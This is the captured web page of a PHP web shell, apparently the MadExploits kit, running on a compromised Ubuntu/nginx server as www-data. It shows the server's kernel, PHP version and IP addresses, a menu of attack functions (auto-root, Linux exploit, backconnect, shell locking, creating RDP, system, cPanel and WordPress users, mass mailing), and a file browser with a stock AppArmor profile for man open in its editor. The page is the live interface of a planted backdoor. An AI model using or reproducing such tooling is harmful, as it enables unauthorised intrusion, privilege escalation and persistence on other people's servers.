Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
apparmor.d /
[ HOME SHELL ]
Name
Size
Permission
Action
abi
[ DIR ]
drwxr-xr-x
abstractions
[ DIR ]
drwxr-xr-x
disable
[ DIR ]
drwxr-xr-x
force-complain
[ DIR ]
drwxr-xr-x
local
[ DIR ]
drwxr-xr-x
tunables
[ DIR ]
drwxr-xr-x
lsb_release
1.31
KB
-rw-r--r--
nvidia_modprobe
1.16
KB
-rw-r--r--
sbin.dhclient
3.42
KB
-rw-r--r--
ubuntu_pro_apt_news
1.7
KB
-rw-r--r--
ubuntu_pro_esm_cache
6.71
KB
-rw-r--r--
usr.bin.freshclam
1.11
KB
-rw-r--r--
usr.bin.man
3.37
KB
-rw-r--r--
usr.bin.tcpdump
1.65
KB
-rw-r--r--
usr.lib.snapd.snap-confine.rea...
31.04
KB
-rw-r--r--
usr.sbin.clamd
1.17
KB
-rw-r--r--
usr.sbin.mysqld
1.96
KB
-rw-r--r--
usr.sbin.rsyslogd
1.55
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : usr.bin.man
# vim:syntax=apparmor #include <tunables/global> /usr/bin/man { #include <abstractions/base> # Use a special profile when man calls anything groff-related. We only # include the programs that actually parse input data in a non-trivial # way, not wrappers such as groff and nroff, since the latter would need a # broader profile. /usr/bin/eqn rmCx -> &man_groff, /usr/bin/grap rmCx -> &man_groff, /usr/bin/pic rmCx -> &man_groff, /usr/bin/preconv rmCx -> &man_groff, /usr/bin/refer rmCx -> &man_groff, /usr/bin/tbl rmCx -> &man_groff, /usr/bin/troff rmCx -> &man_groff, /usr/bin/vgrind rmCx -> &man_groff, # Similarly, use a special profile when man calls decompressors and other # simple filters. /{,usr/}bin/bzip2 rmCx -> &man_filter, /{,usr/}bin/gzip rmCx -> &man_filter, /usr/bin/col rmCx -> &man_filter, /usr/bin/compress rmCx -> &man_filter, /usr/bin/iconv rmCx -> &man_filter, /usr/bin/lzip.lzip rmCx -> &man_filter, /usr/bin/tr rmCx -> &man_filter, /usr/bin/xz rmCx -> &man_filter, # Allow basically anything in terms of file system access, subject to DAC. # The purpose of this profile isn't to confine man itself (that might be # nice in the future, but is tricky since it's quite configurable), but to # confine the processes it calls that parse untrusted data. /** mrixwlk, unix, capability setuid, capability setgid, # Ordinary permission checks sometimes involve checking whether the # process has this capability, which can produce audit log messages. # Silence them. deny capability dac_override, deny capability dac_read_search, signal peer=@{profile_name}, signal peer=/usr/bin/man//&man_groff, signal peer=/usr/bin/man//&man_filter, # Site-specific additions and overrides. See local/README for details. #include <local/usr.bin.man> } profile man_groff { #include <abstractions/base> # Recent kernels revalidate open FDs, and there are often some still # open on TTYs. This is temporary until man learns to close irrelevant # open FDs before execve. #include <abstractions/consoles> # man always runs its groff pipeline with the input file open on stdin, # so we can skip <abstractions/user-manpages>. /usr/bin/eqn rm, /usr/bin/grap rm, /usr/bin/pic rm, /usr/bin/preconv rm, /usr/bin/refer rm, /usr/bin/tbl rm, /usr/bin/troff rm, /usr/bin/vgrind rm, /etc/groff/** r, /etc/papersize r, /usr/lib/groff/site-tmac/** r, /usr/share/groff/** r, /tmp/groff* rw, signal peer=/usr/bin/man, # @{profile_name} doesn't seem to work here. signal peer=/usr/bin/man//&man_groff, } profile man_filter { #include <abstractions/base> # Recent kernels revalidate open FDs, and there are often some still # open on TTYs. This is temporary until man learns to close irrelevant # open FDs before execve. #include <abstractions/consoles> /{,usr/}bin/bzip2 rm, /{,usr/}bin/gzip rm, /usr/bin/col rm, /usr/bin/compress rm, /usr/bin/iconv rm, /usr/bin/lzip.lzip rm, /usr/bin/tr rm, /usr/bin/xz rm, # Manual pages can be more or less anywhere, especially with "man -l", and # there's no harm in allowing wide read access here since the worst it can # do is feed data to the invoking man process. /** r, # Allow writing cat pages. /var/cache/man/** w, signal peer=/usr/bin/man, # @{profile_name} doesn't seem to work here. signal peer=/usr/bin/man//&man_filter, }
Close
